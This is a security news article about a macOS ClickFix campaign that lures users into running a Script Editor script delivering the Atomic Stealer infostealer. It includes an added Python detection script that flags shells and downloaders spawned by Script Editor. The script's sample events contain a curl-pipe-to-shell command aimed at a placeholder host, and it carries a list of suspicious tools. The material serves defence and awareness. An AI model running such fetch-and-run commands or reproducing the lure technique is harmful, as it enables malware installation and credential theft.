Security researchers have recently discovered a ClickFix campaign that specifically targets Mac users. The campaign uses a counterfeit Apple-themed webpage that misleads users into believing they are following legitimate instructions on how to ‘reclaim disk space on their Mac’.
Understanding ClickFix
ClickFix is a social engineering tactic that tricks individuals into executing harmful commands on their systems, often under the pretense of fixing an issue or performing regular maintenance. Initially focused on Windows platforms, this approach has expanded to include macOS and Linux users.
According to researchers, the traditional method for executing ClickFix attacks on macOS involved persuading users to copy and paste malicious commands into the Terminal application, disguised as troubleshooting commands. In response to these attacks, Apple introduced a new security feature in macOS 26.4 that scans commands before they are executed, making it more challenging for attackers.
Consequently, malicious actors have adapted their strategies, shifting towards browser-triggered workflows that open Script Editor, the built-in editor for AppleScript and JavaScript for Automation. Both Terminal and Script Editor ship with every macOS installation, so attackers can abuse them without first installing anything on the victim's machine.
The Deceptive Process
For victims, the attack unfolds in a series of steps:
- Users visit the fraudulent webpage and follow the provided instructions.
- They click a button labeled “Execute,” triggering the attack.
- A prompt appears, asking for permission to open Script Editor.
- Script Editor launches, pre-filled with the attackers' malicious script.
- Depending on their macOS version, users may receive an additional warning about executing the script.
- If users disregard the warning and permit the script to run, it will silently download and execute an Atomic Stealer variant.
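The chain described above ends with Script Editor running a script that spawns a shell and a downloader. The following is an added detection example, not code from the article or from the researchers it cites: it walks constructed process-creation events (JSON lines in the style of an EDR export; the field names, the Script Editor executable path and every sample event are assumptions made for illustration) and flags shell, curl and osascript processes whose ancestry leads back to Script Editor, rating the finding higher when the command line carries a download indicator.

```python
"""Flag shell/download activity descending from Script Editor.

Added example, not from the original article. Field names, the Script
Editor path and the sample events below are constructed for illustration.
"""
import json
import re

# Script Editor's executable path on current macOS (assumed; adjust for your fleet).
LURE_PARENTS = {
    "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor",
}
# Children worth a look when they descend from Script Editor: shells and the
# helpers a "download and run" script would typically invoke.
SUSPICIOUS_CHILDREN = {"sh", "bash", "zsh", "curl", "wget", "osascript", "nohup", "xattr", "open"}
# Download indicator in a command line: a fetch tool or a URL.
DOWNLOAD_RE = re.compile(r"\b(curl|wget)\b|https?://")

# Constructed sample process-creation events (JSON lines), not real telemetry.
SAMPLE_EVENTS = r"""
{"pid": 500, "ppid": 1, "path": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor", "cmdline": "Script Editor"}
{"pid": 501, "ppid": 500, "path": "/bin/sh", "cmdline": "sh -c \"curl -fsSL http://example.invalid/a | sh\""}
{"pid": 502, "ppid": 501, "path": "/usr/bin/curl", "cmdline": "curl -fsSL http://example.invalid/a"}
{"pid": 503, "ppid": 500, "path": "/usr/bin/osascript", "cmdline": "osascript -e \"display dialog Reclaiming disk space\""}
{"pid": 600, "ppid": 1, "path": "/Applications/Xcode.app/Contents/MacOS/Xcode", "cmdline": "Xcode"}
{"pid": 601, "ppid": 600, "path": "/bin/zsh", "cmdline": "zsh -c make"}
{"pid": 800, "ppid": 500, "path": "/usr/bin/mdls", "cmdline": "mdls file.scpt"}
"""


def parse_events(text: str) -> list[dict]:
    """Parse one JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def ancestry(event: dict, by_pid: dict, max_depth: int) -> list[dict]:
    """Return [parent, grandparent, ...] up to max_depth, stopping at unknown pids."""
    chain = []
    cur = event
    for _ in range(max_depth):
        parent = by_pid.get(cur["ppid"])
        if parent is None:
            break
        chain.append(parent)
        cur = parent
    return chain


def scan(events: list[dict], max_depth: int = 4) -> list[dict]:
    """Return findings for suspicious processes with Script Editor in their ancestry.

    Walking ancestors rather than checking only the direct parent catches the
    curl spawned by the shell that Script Editor started, not just the shell.
    """
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if basename(e["path"]) not in SUSPICIOUS_CHILDREN:
            continue
        chain = ancestry(e, by_pid, max_depth)
        if not any(a["path"] in LURE_PARENTS for a in chain):
            continue
        severity = "high" if DOWNLOAD_RE.search(e["cmdline"]) else "medium"
        tree = " -> ".join(basename(a["path"]) for a in reversed(chain))
        findings.append({"pid": e["pid"], "severity": severity,
                         "tree": f"{tree} -> {basename(e['path'])}"})
    return findings


if __name__ == "__main__":
    for f in scan(parse_events(SAMPLE_EVENTS)):
        print(f"[{f['severity']}] pid {f['pid']}: {f['tree']}")
```

On the sample data the scan reports the shell and the curl it spawned as high-severity (Script Editor -> sh -> curl) and the osascript child as medium, while the shell spawned by Xcode and the harmless mdls lookup are ignored. Legitimate AppleScript that uses "do shell script" will also trip the medium tier, so treat it as a hunting lead and tune the parent and child sets to your environment.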
Atomic Stealer, also known as AMOS, is a malware-as-a-service offering sold to cybercriminals on a subscription basis. It can collect system information, extract sensitive data from Keychain (Apple's password manager), harvest autofill data, passwords, cookies and credit card information from web browsers, and steal data from cryptocurrency wallets.
Researchers have published indicators of compromise for this delivery method and urge users to remain cautious when interacting with online content that appears to come from reputable sources.
As cyber threats evolve, it is crucial for individuals to be aware of the tactics employed by attackers and to follow basic security practices. Users should scrutinize URLs, avoid suspicious links, and keep the security features their operating system provides enabled. Above all, a webpage that asks you to paste a command into Terminal or to run a script it has opened in Script Editor should be treated as hostile, and the warning macOS shows before running such a script is the last chance to stop the attack.
The ClickFix campaign shows why Mac users cannot rely on platform reputation alone. Knowing how these lures work, and refusing to run commands or scripts on a website's instructions, significantly reduces the risk of falling victim to them.
Source: Help Net Security News